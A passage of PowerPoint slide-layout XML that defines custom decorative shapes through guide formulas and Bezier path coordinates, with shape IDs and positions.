              <a:gd name="T26" fmla="*/ 136 w 335"/>
              <a:gd name="T27" fmla="*/ 220 h 335"/>
              <a:gd name="T28" fmla="*/ 111 w 335"/>
              <a:gd name="T29" fmla="*/ 220 h 335"/>
              <a:gd name="T30" fmla="*/ 111 w 335"/>
              <a:gd name="T31" fmla="*/ 245 h 335"/>
              <a:gd name="T32" fmla="*/ 110 w 335"/>
              <a:gd name="T33" fmla="*/ 273 h 335"/>
              <a:gd name="T34" fmla="*/ 82 w 335"/>
              <a:gd name="T35" fmla="*/ 274 h 335"/>
              <a:gd name="T36" fmla="*/ 57 w 335"/>
              <a:gd name="T37" fmla="*/ 274 h 335"/>
              <a:gd name="T38" fmla="*/ 57 w 335"/>
              <a:gd name="T39" fmla="*/ 299 h 335"/>
              <a:gd name="T40" fmla="*/ 56 w 335"/>
              <a:gd name="T41" fmla="*/ 328 h 335"/>
              <a:gd name="T42" fmla="*/ 27 w 335"/>
              <a:gd name="T43" fmla="*/ 329 h 335"/>
              <a:gd name="T44" fmla="*/ 3 w 335"/>
              <a:gd name="T45" fmla="*/ 329 h 335"/>
              <a:gd name="T46" fmla="*/ 0 w 335"/>
              <a:gd name="T47" fmla="*/ 326 h 335"/>
              <a:gd name="T48" fmla="*/ 28 w 335"/>
              <a:gd name="T49" fmla="*/ 325 h 335"/>
              <a:gd name="T50" fmla="*/ 53 w 335"/>
              <a:gd name="T51" fmla="*/ 325 h 335"/>
              <a:gd name="T52" fmla="*/ 53 w 335"/>
              <a:gd name="T53" fmla="*/ 300 h 335"/>
              <a:gd name="T54" fmla="*/ 54 w 335"/>
              <a:gd name="T55" fmla="*/ 272 h 335"/>
              <a:gd name="T56" fmla="*/ 83 w 335"/>
              <a:gd name="T57" fmla="*/ 271 h 335"/>
              <a:gd name="T58" fmla="*/ 107 w 335"/>
              <a:gd name="T59" fmla="*/ 271 h 335"/>
              <a:gd name="T60" fmla="*/ 108 w 335"/>
              <a:gd name="T61" fmla="*/ 246 h 335"/>
              <a:gd name="T62" fmla="*/ 109 w 335"/>
              <a:gd name="T63" fmla="*/ 217 h 335"/>
              <a:gd name="T64" fmla="*/ 137 w 335"/>
              <a:gd name="T65" fmla="*/ 216 h 335"/>
              <a:gd name="T66" fmla="*/ 162 w 335"/>
              <a:gd name="T67" fmla="*/ 216 h 335"/>
              <a:gd name="T68" fmla="*/ 162 w 335"/>
              <a:gd name="T69" fmla="*/ 192 h 335"/>
              <a:gd name="T70" fmla="*/ 163 w 335"/>
              <a:gd name="T71" fmla="*/ 163 h 335"/>
              <a:gd name="T72" fmla="*/ 192 w 335"/>
              <a:gd name="T73" fmla="*/ 162 h 335"/>
              <a:gd name="T74" fmla="*/ 216 w 335"/>
              <a:gd name="T75" fmla="*/ 162 h 335"/>
              <a:gd name="T76" fmla="*/ 216 w 335"/>
              <a:gd name="T77" fmla="*/ 137 h 335"/>
              <a:gd name="T78" fmla="*/ 217 w 335"/>
              <a:gd name="T79" fmla="*/ 109 h 335"/>
              <a:gd name="T80" fmla="*/ 246 w 335"/>
              <a:gd name="T81" fmla="*/ 107 h 335"/>
              <a:gd name="T82" fmla="*/ 271 w 335"/>
              <a:gd name="T83" fmla="*/ 107 h 335"/>
              <a:gd name="T84" fmla="*/ 271 w 335"/>
              <a:gd name="T85" fmla="*/ 83 h 335"/>
              <a:gd name="T86" fmla="*/ 272 w 335"/>
              <a:gd name="T87" fmla="*/ 54 h 335"/>
              <a:gd name="T88" fmla="*/ 300 w 335"/>
              <a:gd name="T89" fmla="*/ 53 h 335"/>
              <a:gd name="T90" fmla="*/ 325 w 335"/>
              <a:gd name="T91" fmla="*/ 53 h 335"/>
              <a:gd name="T92" fmla="*/ 325 w 335"/>
              <a:gd name="T93" fmla="*/ 28 h 335"/>
              <a:gd name="T94" fmla="*/ 326 w 335"/>
              <a:gd name="T95" fmla="*/ 0 h 335"/>
              <a:gd name="T96" fmla="*/ 329 w 335"/>
              <a:gd name="T97" fmla="*/ 3 h 335"/>
              <a:gd name="T98" fmla="*/ 329 w 335"/>
              <a:gd name="T99" fmla="*/ 27 h 335"/>
              <a:gd name="T100" fmla="*/ 328 w 335"/>
              <a:gd name="T101" fmla="*/ 56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5" h="335">
                <a:moveTo>
                  <a:pt x="328" y="56"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="63"/>
                  <a:pt x="309" y="60"/>
                  <a:pt x="299" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="54"/>
                  <a:pt x="280" y="51"/>
                  <a:pt x="274" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="269" y="63"/>
                  <a:pt x="271" y="72"/>
                  <a:pt x="274" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="92"/>
                  <a:pt x="281" y="103"/>
                  <a:pt x="273" y="110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="118"/>
                  <a:pt x="255" y="114"/>
                  <a:pt x="245" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="108"/>
                  <a:pt x="226" y="105"/>
                  <a:pt x="220" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="117"/>
                  <a:pt x="217" y="126"/>
                  <a:pt x="220" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="223" y="146"/>
                  <a:pt x="227" y="157"/>
                  <a:pt x="219" y="165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="172"/>
                  <a:pt x="201" y="169"/>
                  <a:pt x="190" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181" y="163"/>
                  <a:pt x="172" y="160"/>
                  <a:pt x="166" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="172"/>
                  <a:pt x="163" y="181"/>
                  <a:pt x="166" y="190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="201"/>
                  <a:pt x="172" y="211"/>
                  <a:pt x="165" y="219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="227"/>
                  <a:pt x="146" y="223"/>
                  <a:pt x="136" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="217"/>
                  <a:pt x="117" y="214"/>
                  <a:pt x="111" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="226"/>
                  <a:pt x="108" y="235"/>
                  <a:pt x="111" y="245"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="255"/>
                  <a:pt x="118" y="266"/>
                  <a:pt x="110" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103" y="281"/>
                  <a:pt x="92" y="278"/>
                  <a:pt x="82" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="271"/>
                  <a:pt x="63" y="268"/>
                  <a:pt x="57" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="280"/>
                  <a:pt x="54" y="289"/>
                  <a:pt x="57" y="299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="309"/>
                  <a:pt x="64" y="320"/>
                  <a:pt x="56" y="328"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="335"/>
                  <a:pt x="38" y="332"/>
                  <a:pt x="27" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="326"/>
                  <a:pt x="9" y="323"/>
                  <a:pt x="3" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="318"/>
                  <a:pt x="18" y="322"/>
                  <a:pt x="28" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="328"/>
                  <a:pt x="47" y="331"/>
                  <a:pt x="53" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="319"/>
                  <a:pt x="56" y="310"/>
                  <a:pt x="53" y="300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="290"/>
                  <a:pt x="47" y="279"/>
                  <a:pt x="54" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="264"/>
                  <a:pt x="73" y="267"/>
                  <a:pt x="83" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="274"/>
                  <a:pt x="101" y="276"/>
                  <a:pt x="107" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="265"/>
                  <a:pt x="111" y="255"/>
                  <a:pt x="108" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="236"/>
                  <a:pt x="101" y="225"/>
                  <a:pt x="109" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="210"/>
                  <a:pt x="127" y="213"/>
                  <a:pt x="137" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="219"/>
                  <a:pt x="156" y="222"/>
                  <a:pt x="162" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="210"/>
                  <a:pt x="165" y="201"/>
                  <a:pt x="162" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="181"/>
                  <a:pt x="155" y="171"/>
                  <a:pt x="163" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="155"/>
                  <a:pt x="181" y="159"/>
                  <a:pt x="192" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201" y="165"/>
                  <a:pt x="210" y="168"/>
                  <a:pt x="216" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="156"/>
                  <a:pt x="219" y="147"/>
                  <a:pt x="216" y="137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="127"/>
                  <a:pt x="210" y="116"/>
                  <a:pt x="217" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225" y="101"/>
                  <a:pt x="236" y="104"/>
                  <a:pt x="246" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="110"/>
                  <a:pt x="265" y="113"/>
                  <a:pt x="271" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="101"/>
                  <a:pt x="274" y="92"/>
                  <a:pt x="271" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="72"/>
                  <a:pt x="264" y="62"/>
                  <a:pt x="272" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279" y="47"/>
                  <a:pt x="290" y="50"/>
                  <a:pt x="300" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="56"/>
                  <a:pt x="319" y="59"/>
                  <a:pt x="325" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="47"/>
                  <a:pt x="328" y="38"/>
                  <a:pt x="325" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="322" y="18"/>
                  <a:pt x="318" y="7"/>
                  <a:pt x="326" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="323" y="9"/>
                  <a:pt x="326" y="18"/>
                  <a:pt x="329" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="332" y="38"/>
                  <a:pt x="335" y="48"/>
                  <a:pt x="328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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B181C0-4937-4DB9-8B38-67E2C309E548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9072562" y="5445579"/>
            <a:ext cx="657225" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 8 w 336"/>
              <a:gd name="T1" fmla="*/ 279 h 335"/>
              <a:gd name="T2" fmla="*/ 37 w 336"/>
              <a:gd name="T3" fmla="*/ 278 h 335"/>
              <a:gd name="T4" fmla="*/ 61 w 336"/>
              <a:gd name="T5" fmla="*/ 278 h 335"/>
              <a:gd name="T6" fmla="*/ 61 w 336"/>
              <a:gd name="T7" fmla="*/ 253 h 335"/>
              <a:gd name="T8" fmla="*/ 63 w 336"/>
              <a:gd name="T9" fmla="*/ 225 h 335"/>
              <a:gd name="T10" fmla="*/ 91 w 336"/>
              <a:gd name="T11" fmla="*/ 224 h 335"/>
              <a:gd name="T12" fmla="*/ 116 w 336"/>
              <a:gd name="T13" fmla="*/ 224 h 335"/>
              <a:gd name="T14" fmla="*/ 116 w 336"/>
              <a:gd name="T15" fmla="*/ 199 h 335"/>
              <a:gd name="T16" fmla="*/ 117 w 336"/>
              <a:gd name="T17" fmla="*/ 170 h 335"/>
              <a:gd name="T18" fmla="*/ 146 w 336"/>
              <a:gd name="T19" fmla="*/ 169 h 335"/>
              <a:gd name="T20" fmla="*/ 170 w 336"/>
              <a:gd name="T21" fmla="*/ 169 h 335"/>
              <a:gd name="T22" fmla="*/ 170 w 336"/>
              <a:gd name="T23" fmla="*/ 145 h 335"/>
              <a:gd name="T24" fmla="*/ 171 w 336"/>
              <a:gd name="T25" fmla="*/ 116 h 335"/>
              <a:gd name="T26" fmla="*/ 200 w 336"/>
              <a:gd name="T27" fmla="*/ 115 h 335"/>
              <a:gd name="T28" fmla="*/ 225 w 336"/>
              <a:gd name="T29" fmla="*/ 115 h 335"/>
              <a:gd name="T30" fmla="*/ 225 w 336"/>
              <a:gd name="T31" fmla="*/ 90 h 335"/>
              <a:gd name="T32" fmla="*/ 226 w 336"/>
              <a:gd name="T33" fmla="*/ 62 h 335"/>
              <a:gd name="T34" fmla="*/ 254 w 336"/>
              <a:gd name="T35" fmla="*/ 61 h 335"/>
              <a:gd name="T36" fmla="*/ 279 w 336"/>
              <a:gd name="T37" fmla="*/ 60 h 335"/>
              <a:gd name="T38" fmla="*/ 279 w 336"/>
              <a:gd name="T39" fmla="*/ 36 h 335"/>
              <a:gd name="T40" fmla="*/ 280 w 336"/>
              <a:gd name="T41" fmla="*/ 7 h 335"/>
              <a:gd name="T42" fmla="*/ 309 w 336"/>
              <a:gd name="T43" fmla="*/ 6 h 335"/>
              <a:gd name="T44" fmla="*/ 333 w 336"/>
              <a:gd name="T45" fmla="*/ 6 h 335"/>
              <a:gd name="T46" fmla="*/ 336 w 336"/>
              <a:gd name="T47" fmla="*/ 9 h 335"/>
              <a:gd name="T48" fmla="*/ 307 w 336"/>
              <a:gd name="T49" fmla="*/ 10 h 335"/>
              <a:gd name="T50" fmla="*/ 283 w 336"/>
              <a:gd name="T51" fmla="*/ 10 h 335"/>
              <a:gd name="T52" fmla="*/ 283 w 336"/>
              <a:gd name="T53" fmla="*/ 35 h 335"/>
              <a:gd name="T54" fmla="*/ 282 w 336"/>
              <a:gd name="T55" fmla="*/ 63 h 335"/>
              <a:gd name="T56" fmla="*/ 253 w 336"/>
              <a:gd name="T57" fmla="*/ 64 h 335"/>
              <a:gd name="T58" fmla="*/ 228 w 336"/>
              <a:gd name="T59" fmla="*/ 64 h 335"/>
              <a:gd name="T60" fmla="*/ 228 w 336"/>
              <a:gd name="T61" fmla="*/ 89 h 335"/>
              <a:gd name="T62" fmla="*/ 227 w 336"/>
              <a:gd name="T63" fmla="*/ 118 h 335"/>
              <a:gd name="T64" fmla="*/ 199 w 336"/>
              <a:gd name="T65" fmla="*/ 119 h 335"/>
              <a:gd name="T66" fmla="*/ 174 w 336"/>
              <a:gd name="T67" fmla="*/ 119 h 335"/>
              <a:gd name="T68" fmla="*/ 174 w 336"/>
              <a:gd name="T69" fmla="*/ 143 h 335"/>
              <a:gd name="T70" fmla="*/ 173 w 336"/>
              <a:gd name="T71" fmla="*/ 172 h 335"/>
              <a:gd name="T72" fmla="*/ 144 w 336"/>
              <a:gd name="T73" fmla="*/ 173 h 335"/>
              <a:gd name="T74" fmla="*/ 120 w 336"/>
              <a:gd name="T75" fmla="*/ 173 h 335"/>
              <a:gd name="T76" fmla="*/ 120 w 336"/>
              <a:gd name="T77" fmla="*/ 198 h 335"/>
              <a:gd name="T78" fmla="*/ 119 w 336"/>
              <a:gd name="T79" fmla="*/ 226 h 335"/>
              <a:gd name="T80" fmla="*/ 90 w 336"/>
              <a:gd name="T81" fmla="*/ 227 h 335"/>
              <a:gd name="T82" fmla="*/ 65 w 336"/>
              <a:gd name="T83" fmla="*/ 228 h 335"/>
              <a:gd name="T84" fmla="*/ 65 w 336"/>
              <a:gd name="T85" fmla="*/ 252 h 335"/>
              <a:gd name="T86" fmla="*/ 64 w 336"/>
              <a:gd name="T87" fmla="*/ 281 h 335"/>
              <a:gd name="T88" fmla="*/ 36 w 336"/>
              <a:gd name="T89" fmla="*/ 282 h 335"/>
              <a:gd name="T90" fmla="*/ 11 w 336"/>
              <a:gd name="T91" fmla="*/ 282 h 335"/>
              <a:gd name="T92" fmla="*/ 11 w 336"/>
              <a:gd name="T93" fmla="*/ 307 h 335"/>
              <a:gd name="T94" fmla="*/ 10 w 336"/>
              <a:gd name="T95" fmla="*/ 335 h 335"/>
              <a:gd name="T96" fmla="*/ 7 w 336"/>
              <a:gd name="T97" fmla="*/ 332 h 335"/>
              <a:gd name="T98" fmla="*/ 7 w 336"/>
              <a:gd name="T99" fmla="*/ 308 h 335"/>
              <a:gd name="T100" fmla="*/ 8 w 336"/>
              <a:gd name="T101" fmla="*/ 279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6" h="335">
                <a:moveTo>
                  <a:pt x="8" y="279"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="271"/>
                  <a:pt x="26" y="275"/>
                  <a:pt x="37" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="281"/>
                  <a:pt x="55" y="284"/>
                  <a:pt x="61" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="272"/>
                  <a:pt x="64" y="263"/>
                  <a:pt x="61" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="243"/>
                  <a:pt x="55" y="232"/>
                  <a:pt x="63" y="225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="217"/>
                  <a:pt x="81" y="220"/>
                  <a:pt x="91" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="227"/>
                  <a:pt x="110" y="230"/>
                  <a:pt x="116" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="218"/>
                  <a:pt x="119" y="209"/>
                  <a:pt x="116" y="199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="189"/>
                  <a:pt x="109" y="178"/>
                  <a:pt x="117" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="163"/>
                  <a:pt x="135" y="166"/>
                  <a:pt x="146" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="172"/>
                  <a:pt x="164" y="175"/>
                  <a:pt x="170" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="163"/>
                  <a:pt x="173" y="154"/>
                  <a:pt x="170" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167" y="134"/>
                  <a:pt x="164" y="124"/>
                  <a:pt x="171" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="108"/>
                  <a:pt x="190" y="112"/>
                  <a:pt x="200" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209" y="118"/>
                  <a:pt x="219" y="121"/>
                  <a:pt x="225" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="230" y="109"/>
                  <a:pt x="228" y="100"/>
                  <a:pt x="225" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="80"/>
                  <a:pt x="218" y="69"/>
                  <a:pt x="226" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="54"/>
                  <a:pt x="244" y="57"/>
                  <a:pt x="254" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="264" y="64"/>
                  <a:pt x="273" y="66"/>
                  <a:pt x="279" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="55"/>
                  <a:pt x="282" y="45"/>
                  <a:pt x="279" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276" y="26"/>
                  <a:pt x="272" y="15"/>
                  <a:pt x="280" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="0"/>
                  <a:pt x="298" y="3"/>
                  <a:pt x="309" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="9"/>
                  <a:pt x="327" y="12"/>
                  <a:pt x="333" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="17"/>
                  <a:pt x="318" y="13"/>
                  <a:pt x="307" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="298" y="7"/>
                  <a:pt x="289" y="4"/>
                  <a:pt x="283" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="16"/>
                  <a:pt x="280" y="25"/>
                  <a:pt x="283" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="286" y="45"/>
                  <a:pt x="289" y="56"/>
                  <a:pt x="282" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="274" y="71"/>
                  <a:pt x="263" y="68"/>
                  <a:pt x="253" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="243" y="61"/>
                  <a:pt x="234" y="58"/>
                  <a:pt x="228" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="70"/>
                  <a:pt x="225" y="79"/>
                  <a:pt x="228" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="99"/>
                  <a:pt x="235" y="110"/>
                  <a:pt x="227" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="125"/>
                  <a:pt x="209" y="122"/>
                  <a:pt x="199" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="116"/>
                  <a:pt x="180" y="113"/>
                  <a:pt x="174" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="125"/>
                  <a:pt x="171" y="134"/>
                  <a:pt x="174" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="154"/>
                  <a:pt x="181" y="164"/>
                  <a:pt x="173" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165" y="180"/>
                  <a:pt x="155" y="176"/>
                  <a:pt x="144" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="170"/>
                  <a:pt x="126" y="167"/>
                  <a:pt x="120" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="179"/>
                  <a:pt x="117" y="188"/>
                  <a:pt x="120" y="198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="208"/>
                  <a:pt x="126" y="219"/>
                  <a:pt x="119" y="226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111" y="234"/>
                  <a:pt x="100" y="231"/>
                  <a:pt x="90" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="224"/>
                  <a:pt x="71" y="222"/>
                  <a:pt x="65" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="233"/>
                  <a:pt x="62" y="243"/>
                  <a:pt x="65" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="262"/>
                  <a:pt x="72" y="273"/>
                  <a:pt x="64" y="281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="288"/>
                  <a:pt x="46" y="285"/>
                  <a:pt x="36" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="279"/>
                  <a:pt x="17" y="276"/>
                  <a:pt x="11" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="288"/>
                  <a:pt x="8" y="297"/>
                  <a:pt x="11" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="317"/>
                  <a:pt x="17" y="328"/>
                  <a:pt x="10" y="335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="326"/>
                  <a:pt x="10" y="317"/>
                  <a:pt x="7" y="308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="297"/>
                  <a:pt x="0" y="287"/>
                  <a:pt x="8" y="2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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B18A7D9-FF2E-40E9-BF5F-770D72B42844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1982220" y="1624149"/>
            <a:ext cx="1489075" cy="1487488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 726 w 762"/>
              <a:gd name="T1" fmla="*/ 36 h 762"/>
              <a:gd name="T2" fmla="*/ 726 w 762"/>
              <a:gd name="T3" fmla="*/ 163 h 762"/>
              <a:gd name="T4" fmla="*/ 163 w 762"/>
              <a:gd name="T5" fmla="*/ 727 h 762"/>
              <a:gd name="T6" fmla="*/ 35 w 762"/>
              <a:gd name="T7" fmla="*/ 727 h 762"/>
              <a:gd name="T8" fmla="*/ 35 w 762"/>
              <a:gd name="T9" fmla="*/ 727 h 762"/>
              <a:gd name="T10" fmla="*/ 35 w 762"/>
              <a:gd name="T11" fmla="*/ 599 h 762"/>
              <a:gd name="T12" fmla="*/ 599 w 762"/>
              <a:gd name="T13" fmla="*/ 36 h 762"/>
              <a:gd name="T14" fmla="*/ 726 w 762"/>
              <a:gd name="T15" fmla="*/ 36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2" h="762">
                <a:moveTo>
                  <a:pt x="726" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="762" y="71"/>
                  <a:pt x="762" y="128"/>
                  <a:pt x="726" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="727"/>
                  <a:pt x="163" y="727"/>
                  <a:pt x="163" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="762"/>
                  <a:pt x="70" y="762"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="692"/>
                  <a:pt x="0" y="635"/>
                  <a:pt x="35" y="599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634" y="0"/>
                  <a:pt x="691" y="0"/>
                  <a:pt x="726" y="36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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15C4BF0-1DE8-41FC-8F76-F95C5917F000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3686403" y="1411607"/>
